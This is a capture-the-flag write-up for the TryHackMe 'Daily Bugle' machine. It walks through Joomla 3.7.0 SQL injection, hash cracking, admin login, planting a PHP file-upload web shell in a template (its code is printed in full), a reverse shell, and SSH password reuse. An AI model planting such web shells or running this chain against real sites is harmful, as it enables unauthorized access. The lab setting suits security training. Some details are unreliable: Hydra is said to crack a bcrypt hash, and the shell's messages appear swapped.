TryHackMe — Daily Bugle Writeup

Let’s find out how difficult this machine is in terms of enumeration, exploitation and privilege escalation.

I began the enumeration by opening Nmap.

There was a hidden directory named administrator. Opened the directory and noticed that it was the login page to access Joomla admin portal.The login page doesn’t provide you the version of Joomla which is running but fortunately there is a cool handy tool out there that we can utilize to discover the version. That tool is known as Joomscan.

Joomscan revealed that the version of Joomla was 3.7.0 which may be useful in terms of finding an exploit.

Having found out the version of Joomla enabled me to find an exploit using Searchsploit.

This exploit describes that this version is vulnerable to SQL Injection. Unfortunately, SQLMAP didn’t work for me as it was unstable throughout the exploitation process and didn’t provide any result.You should not rely onSQLMAP as it is not permitted to use in the exam.

TryHackMe has also suggested to use a Python script instead of using SQLMAP so I listened to what TryHackMe had to say and gave it a try. Found this python script calledJoomblah.py which is designed to dump user and session tables. File can be downloaded here .

I got something back, which look liked it was a password hash.

Using either hash-identifier or hashid could verify the type of the hash.

This hash type is bcrypt. This information can be used to form the Hydra request to crack the hash password.

With the use of Hydra, I was able to crack the password. It is a simple Hydra request that can be arranged as above using the wordlistrockyou.

Logged into the portal and found a way to obtain a reverse shell.

Go to Templates → Templates →

Opened Beez3 — Clicked New — Typed upload and select PHP.

It would open up a new page called upload. Typed the following code on that page and clicked save.

<?php echo ‘<b><br><br>’.php_uname().’<br></b>’; echo ‘<form action=”” method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’; echo ‘<input type=”file” name=”file” size=”50"><input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’; if( $_POST[‘_upl’] == “Upload” ) { if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ‘<b>Twitter: @zerofreakz</b><br><br>’; } else { echo ‘<b>Upload Sucess !!!</b><br><br>’; } } ?>

Naviagated the following path.

Host/templates/beez3/upload.php

It would take you to a page like below where you could upload your reverse shell. I used the Pentestmonkey PHP reverse shell and navigated to the below location in order to trigger the shell.

Make sure that Netcat session is opened before triggering the shell.

After thorough enumeration, I managed to recover a password that can be used for two purposes.

1. To login to MYSQL as root.

2. To login to SSH as jjameson.

I first logged into Mysql as root but I couldn’t use it for anything. As I was running out of idea, I used the same password to login toSSH as jjameson. It successfully worked!

By typing sudo -l, we can get a list of commands that we can run as sudo.